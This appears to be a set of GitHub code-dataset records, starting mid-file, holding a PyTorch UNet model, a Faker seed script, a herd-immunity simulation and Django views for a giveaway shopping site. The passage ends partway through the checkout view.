= nn.Conv2d(64, 1, 1)\n\n def forward(self, x):\n # encoder\n e0 = self.enc_conv0(x)\n e1 = self.enc_conv1(self.pool0(e0))\n e2 = self.enc_conv2(self.pool1(e1))\n e3 = self.enc_conv3(self.pool2(e2))\n\n # bottleneck\n b = self.bottleneck_conv(self.pool3(e3))\n\n # decoder\n d3 = self.dec_conv3(torch.cat([self.upconv3(b), e3], 1))\n d2 = self.dec_conv2(torch.cat([self.upconv2(d3), e2], 1))\n d1 = self.dec_conv1(torch.cat([self.upconv1(d2), e1], 1))\n d0 = self.dec_conv0(torch.cat([self.upconv0(d1), e0], 1))\n\n return torch.sigmoid(self.final_conv(d0))\n\n\nclass UnetBlock(nn.Module):\n \"\"\"\n UNet block\n It can be used to sequrntially build a larger UNet from the bottom up.\n \"\"\"\n\n def __init__(\n self,\n in_channels,\n mid_channels,\n out_channels=None,\n layers=1,\n sub_network=None,\n filter_size=3,\n unet_block=\"cnn\",\n ):\n super().__init__()\n\n # Define which type the encoder/decoder block come from\n\n block = self.cnn_layer\n if unet_block.lower().strip() == \"resnet\":\n block = self.resnet_layer\n\n # Encoder layers\n in_layers = [block(in_channels, mid_channels, filter_size)]\n\n # Set the multiplier for the concatenation cnn's of the decoder\n if sub_network is None:\n inputs_to_outputs = 1\n else:\n inputs_to_outputs = 2\n\n # Decoder layers\n out_layers = [\n block(mid_channels * inputs_to_outputs, mid_channels, filter_size)\n ]\n\n # Sequentially build up the encoder and decoder networks\n for _ in range(layers - 1):\n in_layers.append(block(mid_channels, mid_channels, filter_size))\n out_layers.append(block(mid_channels, mid_channels, filter_size))\n\n # Convolution to preserve size of image\n if out_channels is not None:\n out_layers.append(nn.Conv2d(mid_channels, out_channels, 1, padding=0))\n\n # Unpack the encoder layers in a Sequential module for forward\n self.in_model = nn.Sequential(*in_layers)\n\n # Create a bottleneck layer ( from the subnetworks (if they exist) or a simple conv2d 
that preserves size and channels\n if sub_network is not None:\n self.bottleneck = nn.Sequential(\n # Downscale\n nn.Conv2d(\n mid_channels,\n mid_channels,\n filter_size,\n padding=filter_size // 2,\n stride=2,\n ),\n sub_network,\n # Upscale\n nn.ConvTranspose2d(\n mid_channels,\n mid_channels,\n filter_size,\n padding=filter_size // 2,\n output_padding=1,\n stride=2,\n ),\n )\n else:\n self.bottleneck = None\n\n self.out_model = nn.Sequential(*out_layers)\n\n def forward(self, x):\n full_scale_result = self.in_model(x)\n\n if self.bottleneck is not None:\n bottle_result = self.bottleneck(full_scale_result)\n full_scale_result = torch.cat([full_scale_result, bottle_result], dim=1)\n\n return self.out_model(full_scale_result)\n\n def cnn_layer(self, in_channels, out_channels, kernel_size=3, bn=True):\n padding = kernel_size // 2 # To preserve img dimensions. Equal to int((k-1)/2)\n cnn_bias = False if bn else True # Fewer parameters to save\n return nn.Sequential(\n nn.Conv2d(\n in_channels, out_channels, kernel_size, padding=padding, bias=cnn_bias\n ),\n nn.BatchNorm2d(out_channels) if bn else nn.Identity(),\n nn.LeakyReLU(),\n )\n\n def resnet_layer(self, in_channels, out_channels, kernel_size=3, bn=True):\n padding = kernel_size // 2 # To preserve img dimensions. Equal to int((k-1)/2)\n bias = False if bn else True # Fewer parameters to save\n layers = []\n layers.append(\n nn.Conv2d(\n in_channels, out_channels, kernel_size, padding=padding, bias=bias\n )\n )\n if bn:\n layers.append(nn.BatchNorm2d(out_channels))\n layers.append(nn.LeakyReLU())\n layers.append(\n nn.Conv2d(\n out_channels, out_channels, kernel_size, padding=padding, bias=bias\n )\n )\n if bn:\n layers.append(nn.BatchNorm2d(out_channels))\n\n block = nn.Sequential(*layers)\n\n if in_channels == out_channels:\n identity = nn.Identity()\n else:\n identity = nn.Conv2d(in_channels, out_channels, kernel_size=1)\n\n return ResidualBlock(block, identity)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, block, shortcut):\n super().__init__()\n self.block = block\n self.shortcut = shortcut\n\n def forward(self, x):\n return F.leaky_relu(self.block(x) + self.shortcut(x))\n\n\nclass UNetBlocked(nn.Module):\n \"\"\"\n Creates a UNet from UnetBlock blocks\n \"\"\"\n\n def __init__(self, in_channels, out_channels, unet_block=\"cnn\"):\n \"\"\"\n in_channels: input image channels, usually 3 for rgb or 1 for grayscale\n out_channels: 1 for 1 class segmentation (0,1) or n for n classes\n \"\"\"\n super().__init__()\n\n layers_per_building_block = 2\n\n # Create UNet from UNetBlock 's based on the constructor arguments\n self.unet_model = nn.Sequential(\n UnetBlock(\n in_channels,\n 32,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 32,\n 64,\n out_channels=32,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 64,\n 128,\n out_channels=64,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 128,\n 256,\n out_channels=128,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=None,\n ),\n ),\n ),\n ),\n nn.Conv2d(32, out_channels, 3, padding=1),\n )\n\n def forward(self, x):\n x = self.unet_model(x)\n return x\n","repo_name":"lefteriskat/Image_Segmentation_Project","sub_path":"src/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} 
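# Shape check for the skip connections in the UNet above: each decoder stage
# concatenates the transposed-conv output with the matching encoder map, so
# dec_conv3 must accept 512 (upsampled) + 512 (skip) = 1024 input channels.
# The tensors below are random stand-ins at the corresponding resolutions.
import torch
import torch.nn as nn

up3 = nn.ConvTranspose2d(1024, 512, 2, stride=2)   # bottleneck 8x8 -> 16x16
dec3 = nn.Conv2d(1024, 512, 3, padding=1)          # eats the concatenation

b = torch.randn(1, 1024, 8, 8)      # bottleneck features
e3 = torch.randn(1, 512, 16, 16)    # encoder skip at the same resolution
out = dec3(torch.cat([up3(b), e3], dim=1))
assert out.shape == (1, 512, 16, 16)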
+{"seq_id":"69932852340","text":"import json\nfrom random import randint, getrandbits\nfrom faker import Faker\n\nfake = Faker()\n\ndataset = []\n\nwith open(\"Datasets/services.json\", \"r\") as file:\n services = json.loads(file.read())\n\nwith open(\"Datasets/resorts.json\", \"r\") as file:\n resorts = json.loads(file.read())\n\nwith open(\"Datasets/suitablefor.json\", \"r\") as file:\n suitablefor = json.loads(file.read())\n\nnum = 1\nfor provider in range(1, 249):\n\n rand_services = []\n for i in range(randint(1, 10)):\n service = randint(1, len(services))\n if service not in rand_services:\n rand_services.append(service)\n\n rand_resorts = []\n for i in range(randint(1, 5)):\n resort = randint(1, len(resorts))\n if resort not in rand_resorts:\n rand_resorts.append(resort)\n\n rand_suitablefor = []\n for i in range(randint(1, 5)):\n _suitablefor = randint(1, len(suitablefor))\n if _suitablefor not in rand_suitablefor:\n rand_suitablefor.append(_suitablefor)\n\n if bool(getrandbits(1)):\n dataset.append({\n \"model\": \"db.provider\",\n \"pk\": num,\n \"fields\": {\n \"user_id\": provider,\n \"provider_bio\": fake.sentence(),\n \"services\": rand_services,\n \"suitable_for\": rand_suitablefor,\n \"resorts\": rand_resorts,\n }\n })\n\n num += 1\n\nwith open(\"Datasets/providers.json\", 'w') as file:\n file.write(json.dumps(dataset))\n","repo_name":"Magni0/Datasets","sub_path":"SeedScripts/seed_provider.py","file_name":"seed_provider.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74747860977","text":"import random, sys\nrandom.seed(42)\nfrom person import Person\nfrom logger import Logger\nfrom virus import Virus\n\n\nclass Simulation(object):\n ''' Main class that will run the herd immunity simulation program.\n Expects initialization parameters passed as command line arguments when file is run.\n\n Simulates the spread of a virus through a given population. 
The percentage of the\n    population that are vaccinated, the size of the population, and the amount of initially\n    infected people in a population are all variables that can be set when the program is run.\n    '''\n    def __init__(self, pop_size, vacc_percentage, virus, mortality_rate, initial_infected=1):\n        ''' Logger object logger records all events during the simulation.\n        Population represents all Persons in the population.\n        The next_person_id is the next available id for all created Persons,\n        and should have a unique _id value.\n        The vaccination percentage represents the total percentage of population\n        vaccinated at the start of the simulation.\n        You will need to keep track of the number of people currently infected with the disease.\n        The total infected people is the running total that have been infected since the\n        simulation began, including the currently infected people who died.\n        You will also need to keep track of the number of people that have died as a result\n        of the infection.\n\n        All arguments will be passed as command-line arguments when the file is run.\n        HINT: Look in the if __name__ == \"__main__\" function at the bottom.\n        '''\n        self.pop_size = pop_size  # Int\n        self.initial_infected = initial_infected  # Int\n        self.next_person_id = 0  # Int\n        self.virus = virus  # Virus object\n        self.total_infected = 0  # Int\n        self.vacc_percentage = vacc_percentage  # float between 0 and 1\n        self.total_dead = 0  # Int\n        file_name = \"{}_simulation_pop_{}_vp_{}_infected_{}.txt\".format(\n            virus.name, pop_size, vacc_percentage, initial_infected)\n        self.logger = Logger(file_name)\n        self.newly_infected = []\n        self.mortality_rate = mortality_rate\n        self.population = self._create_population()  # List of Person objects\n\n    def _create_population(self):\n        '''This method will create the initial population.\n            Args:\n                initial_infected (int): The number of infected people that the simulation\n                will begin with.\n\n            Returns:\n                list: A list of Person objects.\n\n        '''\n        population = []\n        for uid in range(self.pop_size):\n            # If we don't have enough infected people, set person to be infected\n            if self.total_infected < self.initial_infected:\n                population.append(Person(uid, False, self.virus))\n                self.total_infected += 1\n            # They are not infected\n            else:\n                # Randomly choose whether or not they are vaccinated\n                vaccinated = random.random() < self.vacc_percentage\n                population.append(Person(uid, vaccinated, None))\n\n        return population\n\n    def _simulation_should_continue(self):\n        ''' The simulation should only end if the entire population is dead,\n        everyone is vaccinated, or nobody is left infected.\n\n            Returns:\n                bool: True for simulation should continue, False if it should end.\n        '''\n\n        ##TIMO wrote this\n        everyones_dead = True\n        everyones_vaccinated = True\n        noones_infected = True\n        for person in self.population:\n            if person.is_alive:\n                everyones_dead = False\n            if not person.is_vaccinated:\n                everyones_vaccinated = False\n            if person.infection is not None:\n                noones_infected = False\n\n        return not (everyones_vaccinated or everyones_dead or noones_infected)\n\n    def run(self):\n        ''' This method should run the simulation until all requirements for ending\n        the simulation are met.\n        '''\n        #peer programmed\n        self.logger.write_metadata(self.pop_size, self.vacc_percentage, self.virus.name, self.mortality_rate, self.virus.repro_rate)\n        time_step_counter = 1\n\n        while self._simulation_should_continue():\n            newly_infected, newly_killed = self.time_step()\n            total_infected = len([p for p in self.population if p.infection is 
not None and p.is_alive])\n            total_dead = len([p for p in self.population if not p.is_alive])\n            self.logger.log_time_step(time_step_counter, newly_infected, newly_killed, total_infected, total_dead)\n            time_step_counter += 1\n        # round of this simulation.\n        print('The simulation has ended after {} turns.'.format(time_step_counter))\n\n    def time_step(self):\n        ''' This method should contain all the logic for computing one time step\n        in the simulation.\n\n        This includes:\n            1. 100 total interactions with a random person for each infected person\n               in the population\n            2. If the person is dead, grab another random person from the population.\n               Since we don't interact with dead people, this does not count as an interaction.\n            3. Otherwise call simulation.interaction(person, random_person) and\n               increment interaction counter by 1.\n        '''\n        ##Connor Wrote this\n        alive_people = [p for p in self.population if p.is_alive]\n        infected_people = [p for p in alive_people if p.infection is not None]\n        newly_infected = 0\n        for infectedPerson in infected_people:\n            for _ in range(100):\n                randomPerson = random.choice(alive_people)\n                got_infected = self.interaction(infectedPerson, randomPerson)\n                newly_infected += 1 if got_infected else 0\n        newly_killed = 0\n        for person in infected_people:\n            did_die = not person.did_survive_infection(self.mortality_rate)\n            newly_killed += 1 if did_die else 0\n            self.logger.log_infection_survival(person, did_die)\n\n        return newly_infected, newly_killed\n\n    def interaction(self, person, random_person):\n        '''This method should be called any time two living people are selected for an\n        interaction. It assumes that only living people are passed in as parameters.\n\n        Args:\n            person1 (person): The initial infected person\n            random_person (person): The person that person1 interacts with.\n        '''\n        ##connor wrote this\n        assert person.is_alive == True\n        assert random_person.is_alive == True\n\n        if random_person.is_vaccinated:\n            self.logger.log_interaction(person, random_person, False, True, False)\n        elif random_person.infection is None:\n            if random.random() <= self.virus.repro_rate:\n                random_person.infection = person.infection\n                self.logger.log_interaction(person, random_person, False, False, True)\n                return True\n            else:\n                random_person.is_vaccinated = True\n                self.logger.log_interaction(person, random_person, False, False, False)\n        elif random_person.infection is not None:\n            self.logger.log_interaction(person, random_person, True, False, False)\n        return False\n\n    def _infect_newly_infected(self):\n        ''' This method should iterate through the list of ._id stored in self.newly_infected\n        and update each Person object with the disease. 
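# _simulation_should_continue() above tracks three flags through one loop. The
# same decision written with any(), using only the attributes the class
# already relies on; P is a throwaway stand-in for the Person class:
from collections import namedtuple

def should_continue(population):
    anyone_alive = any(p.is_alive for p in population)
    anyone_unvaccinated = any(not p.is_vaccinated for p in population)
    anyone_infected = any(p.infection is not None for p in population)
    return anyone_alive and anyone_unvaccinated and anyone_infected

P = namedtuple("P", "is_alive is_vaccinated infection")
assert should_continue([P(True, False, "flu"), P(True, True, None)])
assert not should_continue([P(True, True, None)])    # everyone vaccinated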
'''\n #CONNOR wrote this\n if len(self.newly_infected) > 0:\n for person in self.newly_infected:\n person.infection = self.virus\n \n self.total_infected += 1\n\n self.newly_infected = []\n\n\n\nif __name__ == \"__main__\":\n params = sys.argv[1:]\n virus_name = str(params[0])\n repro_num = float(params[1])\n mortality_rate = float(params[2])\n\n pop_size = int(params[3])\n vacc_percentage = float(params[4])\n\n\n if len(params) == 6:\n initial_infected = int(params[5])\n else:\n initial_infected = 1\n\n virus = Virus(virus_name, repro_num, mortality_rate)\n sim = Simulation(pop_size, vacc_percentage, virus, mortality_rate, initial_infected)\n\n sim.run()\n \n","repo_name":"Connor-Cahill/herd","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39968917264","text":"from django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login,logout,authenticate\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignupForm,ContactUsForm,Profileform,SendEmailForm,GiveawayForm,TransactionForm\nfrom .models import Profile,Give,Transaction,Charge,Response,OnDeliveryTransaction,State,DestinationCharge,GiveawayCap,ShoppingCart\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.core.mail import send_mail,BadHeaderError\nfrom django.conf import settings\nfrom django.contrib.auth.forms import PasswordResetForm\nfrom django.db.models.query_utils import Q\nfrom django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.core.mail import EmailMultiAlternatives\nfrom django import template\nfrom django.contrib.auth import get_user_model\nimport requests\nfrom datetime import timedelta\nfrom .fields import final_checkout\nfrom itertools import chain\n\n\n\nUserModel = get_user_model()\n\n\n\ndef home(request):\n user=request.user\n electronics=Give.objects.filter(gift_status='unpicked',category='electronics').order_by('-date_posted')[:12]\n natives=Give.objects.filter(gift_status='unpicked',category='natives').order_by('-date_posted')[:12]\n shoes=Give.objects.filter(gift_status='unpicked',category='shoes').order_by('-date_posted')[:12]\n clothes=Give.objects.filter(gift_status='unpicked',category='clothes').order_by('-date_posted')[:12]\n corporate=Give.objects.filter(gift_status='unpicked',category='corporate').order_by('-date_posted')[:12]\n cartItem=Give.objects.filter(gift_recipient=user, gift_status='requested').count\n premium=Give.objects.filter(product_class='premium',gift_status='unpicked').order_by('-date_posted')[:12]\n context={\n 'premium':premium,\n 'cartItem':cartItem,\n 'electronics':electronics,\n 'natives':natives,\n 'shoes':shoes,\n 'clothes':clothes,\n 'corporate':corporate\n }\n return render(request,'givers/new_home.html',context)\n\n\ndef operation(request):\n return render(request,'givers/howitworks.html')\n\ndef policy(request):\n return render(request,'givers/policy.html')\n\ndef about(request):\n return render(request,'givers/about.html')\n\n\ndef reply_contact(request):\n\n 
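# The __main__ block above reads sys.argv positionally, so a missing value
# dies with an IndexError. An equivalent argparse front end (a sketch with
# the same parameters, not the repository's actual interface):
import argparse

parser = argparse.ArgumentParser(description="herd immunity simulation")
parser.add_argument("virus_name")
parser.add_argument("repro_num", type=float)
parser.add_argument("mortality_rate", type=float)
parser.add_argument("pop_size", type=int)
parser.add_argument("vacc_percentage", type=float)
parser.add_argument("initial_infected", type=int, nargs="?", default=1)
# args = parser.parse_args()  # e.g. python simulation.py Ebola 0.25 0.7 1000 0.9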
shape=request.session.get('selected')\n\n if request.method=='POST':\n form=SendEmailForm(request.POST)\n if form.is_valid:\n new_form=form.save(commit=False)\n new_form.email=shape[0]\n new_form.replied_by=request.user.username\n new_form.comment=form.cleaned_data.get('comment')\n new_form.save()\n\n if len(shape)>1:\n comment=form.cleaned_data.get('comment')\n for i in shape[1:]:\n data={\n 'email':i,\n 'comment':comment,\n 'replied_by':request.user.username\n }\n Response.objects.create(**data)\n\n msg=EmailMultiAlternatives('Giveawaynow',form.cleaned_data.get('comment'),settings.EMAIL_HOST_USER,bcc=shape)\n msg.send()\n messages.success(request,'reply sent')\n del request.session['selected']\n return redirect('/admin/givers/contactus')\n\n\n\n\ndef signupuser(request):\n\n if request.method == 'POST':\n form = SignupForm()\n state=request.POST['state']\n username = request.POST['username']\n email = request.POST['email']\n password1 = request.POST['password1']\n password2 = request.POST['password2']\n if password1 == password2:\n if User.objects.filter(username=username).exists():\n messages.error(request,'Username Already Taken')\n return redirect('signupuser')\n\n elif User.objects.filter(email=email).exists():\n messages.error(request,'Email Already Exist')\n return redirect('signupuser')\n\n else:\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db()\n user.first_name=form.cleaned_data.get('firstname')\n user.last_name=form.cleaned_data.get('lastname')\n user.profile.state=form.cleaned_data.get('state')\n user.profile.firstname=form.cleaned_data.get('firstname')\n user.profile.lastname=form.cleaned_data.get('lastname')\n user.profile.email=form.cleaned_data.get('email')\n user.profile.phone_number= form.cleaned_data.get('phone_number')\n if not len(str(user.profile.phone_number)) == 10:\n messages.error(request,'invalid phone number')\n return redirect('signupuser')\n user.save()\n\n subject = 'Activate your account.'\n plaintext = template.loader.get_template('password/acc_activate_email.txt')\n htmltemp = template.loader.get_template('password/acc_activate_email.html')\n c = {\n\t\t\t\t\t\"email\":user.profile.email,\n\t\t\t\t\t'domain':'www.giveawaynow.com.ng',\n\t\t\t\t\t'site_name': 'Giveawaynow',\n\t\t\t\t\t\"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n\t\t\t\t\t\"user\": user,\n\t\t\t\t\t'token': default_token_generator.make_token(user),\n\t\t\t\t\t'protocol': 'https',\n\t\t\t\t\t}\n text_content = plaintext.render(c)\n html_content = htmltemp.render(c)\n try:\n msg = EmailMultiAlternatives(subject, text_content,settings.EMAIL_HOST_USER, [user.profile.email], headers = {'Reply-To': settings.EMAIL_HOST_USER})\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n messages.info(request, \"A verification mail has been sent to your email, kindly complete registration from there. 
\")\n return redirect (\"home\")\n '''username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n user= authenticate(username=username,password=password)\n login(request,user)\n return redirect('account_update')'''\n else:\n form = SignupForm()\n messages.error(request,'form is invalid')\n return redirect('signupuser')\n\n else:\n messages.error(request,'Password does not match')\n return redirect('signupuser')\n\n else:\n form = SignupForm()\n return render(request, 'givers/signupuser.html',{'form':form})\n\n\ndef contact(request):\n\n if request.method=='POST':\n form = ContactUsForm(request.POST)\n if form.is_valid():\n form.save()\n email=form.cleaned_data.get('email')\n subject = \"Giveawaynow\"\n plaintext = template.loader.get_template('password/contact_response.txt')\n htmltemp = template.loader.get_template('password/contact_response.html')\n c={\n 'subject':form.cleaned_data.get('subject')\n }\n text_content = plaintext.render(c)\n html_content = htmltemp.render(c)\n msg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [email], headers = {'Reply-To': email})\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n messages.success(request,'Thanks, we will treat as urgent')\n return redirect('contact')\n else:\n form=ContactUsForm()\n return render(request,'givers/contact.html',{'form':form})\n\n\ndef product_class(request):\n product=Give.objects.filter(product_class='premium',gift_status='unpicked')\n title='Hottest Deals'\n p=Paginator(product,20)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n\n return render(request,'givers/productCart.html',{'page_obj':page_obj,'title':title})\n\n\ndef product_category(request,category):\n product=Give.objects.filter(category=category,gift_status='unpicked').order_by('-date_posted')\n if category=='shoes':\n title='Footwear'\n elif category=='corporate':\n title='Corporate Wears'\n elif category=='natives':\n title='Native wears'\n else:\n title=category\n\n p=Paginator(product,20)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n\n return render(request,'givers/productCart.html',{'page_obj':page_obj,'title':title})\n\n\n@login_required(login_url='/login/')\ndef user_account(request):\n user = request.user\n if user.profile.state=='lagos':\n fit=True\n else:\n fit=False\n\n online_payment= Transaction.objects.filter(made_by=str(user),verified=True)\n ondelivery_payment=OnDeliveryTransaction.objects.filter(made_by=str(user))\n orders=sorted(chain(online_payment,ondelivery_payment),key=lambda order: order.made_on, reverse=True)\n picks= Give.objects.filter(Q(gift_recipient=user.profile.email) & Q(gift_status='requested'))\n cart_items=picks.count\n\n\n if user.profile.state==None or user.profile.phone_number==8000000000:\n prof = get_object_or_404(Profile,user=request.user)\n profile_form= Profileform(instance=prof)\n return render (request, 'givers/account_update.html',{'user':user, 'profile_form':profile_form})\n return render(request,'givers/user_account.html',{'user':user,'picks':picks,'form':TransactionForm(),\n 'fit':fit,'cart_items':cart_items,'orders':orders})\n\n\n\n\n@login_required(login_url='/login/')\ndef report(request):\n user = request.user\n 
give=Give.objects.filter(gift_recipient=request.user.username,gift_status='redeemed')\n if len(give)==0:\n amount=''\n else:\n amt=[]\n for i in give:\n if i.gift.payment_status == 'unpaid':\n if i.gift.amount is not None:\n amt.append(i.gift.amount)\n if sum(amt)==0:\n amount=''\n else:\n amount=sum(amt,2000)\n offered = Give.objects.filter(user=user)\n picks= Give.objects.filter(gift_recipient=user,date_requested__isnull=False)\n return render(request,'givers/report.html',{'picks':picks,'amount':amount,'offered':offered})\n\n\n\n\n@login_required(login_url='/login/')\ndef logoutuser(request):\n logout(request)\n return redirect('home')\n\n\ndef loginuser(request):\n\n if request.method == 'GET':\n return render(request, 'givers/loginuser.html', {'form':AuthenticationForm(),'recaptcha_site_key':settings.GOOGLE_RECAPTCHA_SITE_KEY})\n else:\n user= authenticate(request, username=request.POST['username'],password=request.POST['password'])\n if user is None:\n messages.error(request,'Username or Password Incorrect')\n return redirect('loginuser')\n\n else:\n\n recaptcha_response = request.POST.get('g-recaptcha-response')\n print(recaptcha_response)\n data = {\n\t\t\t'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n\t\t\t'response': recaptcha_response,\n\t\t\t}\n r = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n print(r)\n result = r.json()\n print(result)\n if result['success']:\n login(request,user)\n if request.session.get('first_login'):\n return redirect('account_update')\n return redirect('giveaway')\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n return redirect('loginuser')\n\n\n\ndef creategift(request):\n\n if request.method == 'GET':\n return render(request,'givers/creategiving.html',{'form1':GiveawayForm()})\n\n else:\n form1=GiveawayForm(request.POST)\n if form1.is_valid():\n form1.save()\n messages.success(request,'Thank You for the thoughful gesture')\n return redirect('home')\n else:\n messages.error(request,'form is invalid')\n return render(request,'givers/creategiving.html',{'form1':GiveawayForm()})\n\n\n\ndef giveaway(request):\n user=request.user\n if user.is_anonymous:\n cartItem=''\n else:\n cartItem=Give.objects.filter(gift_recipient=user.profile.email, gift_status='requested').count\n\n gift1= Give.objects.latest('date_posted')\n query = request.GET.get('q')\n if query:\n gifts = Give.objects.filter(Q(date_requested__isnull = True)&Q(category__icontains=query)).order_by('-date_posted')\n else:\n gifts= Give.objects.filter(date_requested__isnull = True).order_by('-date_posted')\n p=Paginator(gifts,60)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n return render(request,'givers/giftpage.html',{'page_obj':page_obj,'user':user,'gift1':gift1,'cartItem':cartItem})\n\n\n\ndef viewgift(request,gift_id):\n user=request.user\n product = get_object_or_404(Give,pk = gift_id)\n if user.is_anonymous:\n cartItem=''\n else:\n cartItem=Give.objects.filter(gift_recipient=user.profile.email, gift_status='requested').count\n return render(request,'givers/detail_page.html',{'product':product,'cartItem':cartItem})\n\n\n\n@login_required(login_url='/login/')\ndef edit_profile(request):\n user=request.user\n prof = get_object_or_404(Profile,user=request.user)\n if request.method == 'GET':\n profile_form= Profileform(instance=prof)\n return render (request, 'givers/account_update.html',{'user':user, 
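# report() above computes sum(amt, 2000): the second argument of sum() is a
# start value, so this reads "total of amt plus a flat 2000" (presumably a
# base charge), not an extra list element:
assert sum([300, 700], 2000) == 3000
assert sum([], 2000) == 2000    # empty iterable still yields the base value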
'profile_form':profile_form})\n else:\n profile_form = Profileform(request.POST,request.FILES,instance=prof)\n if profile_form.is_valid():\n custom_form=profile_form.save(commit=False)\n custom_form.user=request.user\n custom_form.save()\n return redirect('user_account')\n else:\n return render(request,'givers/account_update.html',{'profile_form':profile_form,'error':'info not valid'})\n\n\n\n@login_required(login_url='/login/')\ndef add_to_cart(request,gift_id):\n user=request.user\n pick= get_object_or_404(Give,pk=gift_id)\n current_time=timezone.now()\n three_days_ago=timezone.now()-timedelta(days=3)\n month_ago=timezone.now()-timedelta(days=30)\n premium=ShoppingCart.objects.filter(shopper=str(user),status='in-cart')\n picked_within_three_days=Give.objects.filter(gift_recipient=user.profile.email,date_requested__isnull=False,date_requested__range=[three_days_ago,current_time]).count()\n picked_within_a_month=Give.objects.filter(gift_recipient=user.profile.email,date_requested__isnull=False,date_requested__range=[month_ago,current_time]).count()\n day_cap=GiveawayCap.objects.get(name='days')\n month_cap=GiveawayCap.objects.get(name='month')\n\n if request.method=='POST':\n if pick.state == user.profile.state:\n #minimize gift per user to 4 gifts in 3days\n if picked_within_three_days <= day_cap.number:\n count=0\n if pick.product_class=='premium':\n if premium:\n for i in premium:\n if i.product.product_class=='premium':\n count+=1\n if count>=1:\n messages.error(request,'only one premium item per order')\n return redirect('giveaway')\n\n pick.date_requested=timezone.now()\n pick.gift_recipient=user.profile.email\n pick.gift_status='requested'\n pick.save()\n data={\n 'shopper':user.profile.email,\n 'product':pick\n }\n ShoppingCart.objects.create(**data)\n\n\n else:\n messages.error(request,'you have already picked 4 gifts within 3days')\n return redirect('giveaway')\n else:\n messages.info(request,f'gift only available in {pick.state}')\n\n return redirect('giveaway')\n\n\n\n@login_required(login_url='/login/')\ndef delivery_options(request):\n user=request.user\n if request.method=='POST':\n if 'redeem' in request.POST:\n state=State.objects.get(name=user.profile.state)\n # city=PickupCentre.objects.filter(state=state.id)\n destination=DestinationCharge.objects.filter(state=state)\n\n return render(request,'givers/pickup_centre.html',{'destination':destination})\n\n return redirect('user_account')\n\n\n\n@login_required(login_url='/login/')\ndef returnpicked(request,gift_id):\n user=request.user\n view = get_object_or_404(Give,pk = gift_id)\n if request.method== 'POST':\n view.date_requested=None\n view.gift_recipient=''\n view.gift_status='unpicked'\n view.save(update_fields=['date_requested','gift_recipient','gift_status'])\n ShoppingCart.objects.get(shopper=user.profile.email,product=view).delete()\n return redirect('user_account')\n\n\n\n@login_required(login_url='/login/')\ndef checkout(request):\n user=request.user\n city=request.POST.get('city')\n destination=DestinationCharge.objects.get(city=city)\n products=ShoppingCart.objects.filter(shopper=user.profile.email,status='in-cart')\n if user.profile.state=='lagos':\n fit=True\n else:\n fit=False\n if request.method=='POST':\n request.session['address']=request.POST.get('address')\n request.session['contact']=request.POST.get('contact')\n\n delivery=destination.charge\n request.session['delivery']=delivery\n service=Charge.objects.get(name='standard')\n service_charge=service.charge\n amount=delivery+service_charge\n 
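# add_to_cart() above enforces the pick caps with date_requested__range. The
# same boundary arithmetic in plain Python, with made-up timestamps:
from datetime import datetime, timedelta

now = datetime(2023, 5, 10, 12, 0)
three_days_ago = now - timedelta(days=3)
picks = [datetime(2023, 5, 8), datetime(2023, 5, 1)]   # hypothetical requests
recent = sum(three_days_ago <= p <= now for p in picks)
assert recent == 1          # only the May 8 pick falls inside the window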
